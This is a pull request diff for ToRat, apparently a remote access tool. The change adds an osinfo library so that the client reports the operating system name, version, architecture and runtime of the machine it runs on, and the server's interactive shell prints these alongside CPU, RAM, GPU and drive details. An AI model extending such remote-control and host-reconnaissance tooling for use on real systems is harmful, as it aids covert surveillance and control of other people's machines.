### PR TITLE
Adds support for collecting osinfo

### DIFF
--- a/go.mod
+++ b/go.mod
@@ -4,6 +4,7 @@ go 1.16
 
 require (
 	github.com/BurntSushi/xgb v0.0.0-20210121224620-deaf085860bc // indirect
+	github.com/JustinTimperio/osinfo v0.0.0-20210307040040-1316be5f0aa1
 	github.com/abiosoft/ishell v2.0.0+incompatible
 	github.com/abiosoft/readline v0.0.0-20180607040430-155bce2042db // indirect
 	github.com/chzyer/logex v1.1.10 // indirect

--- a/go.sum
+++ b/go.sum
@@ -2,6 +2,8 @@ github.com/BurntSushi/xgb v0.0.0-20210121224620-deaf085860bc h1:7D+Bh06CRPCJO3gr
 github.com/BurntSushi/xgb v0.0.0-20210121224620-deaf085860bc/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo=
 github.com/EndFirstCorp/peekingReader v0.0.0-20171012052444-257fb6f1a1a6 h1:t27CGFMv8DwGwqRPEa2VNof5I/aZwO6q2gfJhN8q0U4=
 github.com/EndFirstCorp/peekingReader v0.0.0-20171012052444-257fb6f1a1a6/go.mod h1:zpqkXxDsVfEIUZEWvT9yAo8OmRvSlRrcYQ3Zs8sSubA=
+github.com/JustinTimperio/osinfo v0.0.0-20210307040040-1316be5f0aa1 h1:NY2G+SGSJfbm82IuG6zFU1rU5Duo+CM7PLAxsViIUig=
+github.com/JustinTimperio/osinfo v0.0.0-20210307040040-1316be5f0aa1/go.mod h1:XzwetahnRWkdgdIQgXyahEaEvLDncafoTQE+2DeL9H0=
 github.com/StackExchange/wmi v0.0.0-20190523213315-cbe66965904d h1:G0m3OIz70MZUWq3EgK3CesDbo8upS2Vm9/P3FtgI+Jk=
 github.com/StackExchange/wmi v0.0.0-20190523213315-cbe66965904d/go.mod h1:3eOhrUMpNV+6aFIbp5/iudMxNCF27Vw2OZgy4xEx0Fg=
 github.com/abiosoft/ishell v2.0.0+incompatible h1:zpwIuEHc37EzrsIYah3cpevrIc8Oma7oZPxr03tlmmw=
@@ -99,8 +101,6 @@ golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7w
 golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20200501145240-bc7a7d42d5c3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
-golang.org/x/sys v0.0.0-20210301091718-77cc2087c03b h1:kHlr0tATeLRMEiZJu5CknOw/E8V6h69sXXQFGoPtjcc=
-golang.org/x/sys v0.0.0-20210301091718-77cc2087c03b/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210305230114-8fe3ee5dd75b h1:ggRgirZABFolTmi3sn6Ivd9SipZwLedQ5wR0aAKnFxU=
 golang.org/x/sys v0.0.0-20210305230114-8fe3ee5dd75b/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/term v0.0.0-20201117132131-f5c789dd3221/go.mod h1:Nr5EML6q2oocZ2LXRh80K7BxOlk5/8JxuGnuhpl+muw=
@@ -121,8 +121,6 @@ gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C
 gorm.io/driver/sqlite v1.1.4 h1:PDzwYE+sI6De2+mxAneV9Xs11+ZyKV6oxD3wDGkaNvM=
 gorm.io/driver/sqlite v1.1.4/go.mod h1:mJCeTFr7+crvS+TRnWc5Z3UvwxUN1BGBLMrf5LA9DYw=
 gorm.io/gorm v1.20.7/go.mod h1:0HFTzE/SqkGTzK6TlDPPQbAYCluiVvhzoA1+aVyzenw=
-gorm.io/gorm v1.20.12 h1:ebZ5KrSHzet+sqOCVdH9mTjW91L298nX3v5lVxAzSUY=
-gorm.io/gorm v1.20.12/go.mod h1:0HFTzE/SqkGTzK6TlDPPQbAYCluiVvhzoA1+aVyzenw=
 gorm.io/gorm v1.21.2 h1:E9FgSzS9qZneyf5MlXTJBYEZ2ZZKrB993s2v+XBu7vo=
 gorm.io/gorm v1.21.2/go.mod h1:0HFTzE/SqkGTzK6TlDPPQbAYCluiVvhzoA1+aVyzenw=
 howett.net/plist v0.0.0-20181124034731-591f970eefbb h1:jhnBjNi9UFpfpl8YZhA9CrOqpnJdvzuiHsl/dnxl11M=

--- a/shared/models.go
+++ b/shared/models.go
@@ -49,12 +49,15 @@ type EncAsym struct {
 }
 
 type Hardware struct {
-	OS     string
-	CPU    string
-	Cores  uint32
-	RAM    string
-	GPU    string
-	Drives string
+	Runtime   string
+	OSArch    string
+	OSName    string
+	OSVersion string
+	CPU       string
+	Cores     uint32
+	RAM       string
+	GPU       string
+	Drives    string
 }
 
 type Speedtest struct {

--- a/torat_client/rpcapi.go
+++ b/torat_client/rpcapi.go
@@ -8,8 +8,8 @@ import (
 	"os"
 	"path/filepath"
 	"reflect"
-	"runtime"
 
+	"github.com/JustinTimperio/osinfo"
 	"github.com/jaypipes/ghw"
 	"github.com/lu4p/ToRat/shared"
 	"github.com/lu4p/ToRat/torat_client/crypto"
@@ -182,7 +182,11 @@ func (a *API) GetHardware(v shared.Void, r *shared.Hardware) error {
 		return err
 	}
 
-	r.OS = runtime.GOOS
+	release := osinfo.GetVersion()
+	r.Runtime = release.Runtime
+	r.OSArch = release.Arch
+	r.OSName = release.Name
+	r.OSVersion = release.Version
 	r.Cores = cpu.TotalThreads
 	r.RAM = memory.String()
 	r.Drives = block.String()

--- a/torat_server/client_ishell.go
+++ b/torat_server/client_ishell.go
@@ -280,12 +280,15 @@ func (client *activeClient) Hardware(c *ishell.Context) {
 	c.ProgressBar().Final(yellow("["+client.Client.Name+"] ") + green("[+] Hardware collection finished"))
 	c.ProgressBar().Stop()
 
-	c.Println(green("OS:     "), r.OS)
-	c.Println(green("CPU:    "), r.CPU)
-	c.Println(green("CORES:  "), r.Cores)
-	c.Println(green("RAM:    "), r.RAM)
-	c.Println(green("GPU:    "), r.GPU)
-	c.Println(green("Drives: "), r.Drives)
+	c.Println(green("Runtime:     "), r.Runtime)
+	c.Println(green("Arch:        "), r.OSArch)
+	c.Println(green("OS:          "), r.OSName)
+	c.Println(green("OS Version:  "), r.OSVersion)
+	c.Println(green("CPU:         "), r.CPU)
+	c.Println(green("CORES:       "), r.Cores)
+	c.Println(green("RAM:         "), r.RAM)
+	c.Println(green("GPU:         "), r.GPU)
+	c.Println(green("Drives:      "), r.Drives)
 }
 
 // Shred a remote file


### PR DESCRIPTION
Provides more info about the operating system the clients is running on

```
[vBHv3Vc5awx39ivu] [+] Hardware collection finished
Runtime:      linux
Arch:         amd64
OS:           Arch Linux
OS Version:   rolling
CPU:          Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz
CORES:        8
RAM:          memory (32GB physical, 31GB usable)
GPU:          TU104 [GeForce RTX 2080 SUPER]
Drives:       block storage (9 disks, 17TB physical storage)
[vBHv3Vc5awx39ivu] /home/justin/Repos/GoLang/ToRat$  

```